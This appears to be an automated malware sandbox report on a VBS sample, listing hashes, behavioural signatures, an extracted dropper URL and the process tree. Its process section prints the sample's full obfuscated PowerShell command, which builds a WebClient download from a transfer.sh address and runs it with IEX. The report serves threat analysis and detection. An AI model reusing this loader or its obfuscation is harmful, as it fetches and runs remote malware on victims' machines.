Analysis
max time kernel: 121s
max time network: 124s
platform: windows7_x64
resource: win7-20231215-en
resource tags: arch:x64, arch:x86, image:win7-20231215-en, locale:en-us, os:windows7-x64, system
submitted: 04/02/2024, 04:57
Static task: static1

Behavioral task: behavioral1
  Sample: 8e44eb8b76e7cfe54abc30226f76b61f.vbs
  Resource: win7-20231215-en
  4 signatures, 150 seconds

Behavioral task: behavioral2
  Sample: 8e44eb8b76e7cfe54abc30226f76b61f.vbs
  Resource: win10v2004-20231222-en
  6 signatures, 150 seconds
General
Target: 8e44eb8b76e7cfe54abc30226f76b61f.vbs
Size: 950B
MD5: 8e44eb8b76e7cfe54abc30226f76b61f
SHA1: 84bb3650430163978ef1918ba6edaee9a7705389
SHA256: 9d8af568b0657ff10c735bce816033ce6f844aed1879f94ab6e1fee8a8da3677
SHA512: 22bef15c37064a79bcaaca8648b7b52c221fb25b51473a52bf2ec5804c7f2927733183a9e676572b749bef073c733b47cbc08a1c23e462da879b671923c5bc0c
Score: 10/10
Malware Config
Extracted
Language: ps1
Deobfuscated URLs:
  exe.dropper: https://transfer.sh/1kqpOIu/bypass.txt
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   Process
  3024  powershell.exe
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  3024  powershell.exe
- Suspicious use of WriteProcessMemory (3 IoCs)
  description                        pid   Process      procid_target
  PID 2060 wrote to memory of 3024   2060  WScript.exe  28
  PID 2060 wrote to memory of 3024   2060  WScript.exe  28
  PID 2060 wrote to memory of 3024   2060  WScript.exe  28
Processes
- C:\Windows\System32\WScript.exe (PID 2060, depth 1)
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8e44eb8b76e7cfe54abc30226f76b61f.vbs"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3024, depth 2)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SZXDCFVGBHNJSDFGH = 'https://transfer.sh/1kqpOIu/bypass.txt';$EDRFGHNJMKDEFGHJ = 'nE----------------EbC++++++++++++++++T'.Replace('----------------','t.W').Replace('++++++++++++++++','lIEN');$SXDCFVGBHNJXDCFVGBHJK = 'DO*************aDST<<<<<<<<<>>>>>>>>>>>G'.Replace('*************','WnLo').Replace('<<<<<<<<<>>>>>>>>>>>','rIn');$SWXDECRFGYHUJISDFVGHJ ='I`EX(n`-------------`c`T $EDRFGHNJMKD<<<<<<<<<<<<<<>>>>>>>>>>>>>>GBHNJSDFGH)'.Replace('-------------','e`W`-Obj`E').Replace('<<<<<<<<<<<<<<>>>>>>>>>>>>>>','EFGHJ).$SXDCFVGBHNJXDCFVGBHJK($SZXDCFV');&('I'+'EX')($SWXDECRFGYHUJISDFVGHJ -Join '')|&('I'+'EX');
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken